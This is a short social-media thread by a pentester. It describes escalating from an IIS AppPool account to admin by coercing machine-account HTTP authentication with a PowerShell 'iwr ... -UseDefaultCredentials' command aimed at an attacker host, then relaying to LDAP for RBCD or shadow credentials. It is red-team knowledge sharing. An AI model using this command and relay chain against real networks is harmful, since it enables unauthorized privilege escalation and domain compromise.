Former Dev and DevOps|
Pentester and red teamer at orange cyberdefense |
OSCE³|
Tweet are my own|
discord: m4yfly
Jan 11, 2024 • 4 tweets • 2 min read
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ?
Simply use:
powershell iwr http://192.168.56.1 -UseDefaultCredentials
To get an HTTP coerce of the machine account.
👇🧵
than relay to Ldap and :
- start_tls + add a computer to the domain + RBCD
or
- shadow credentials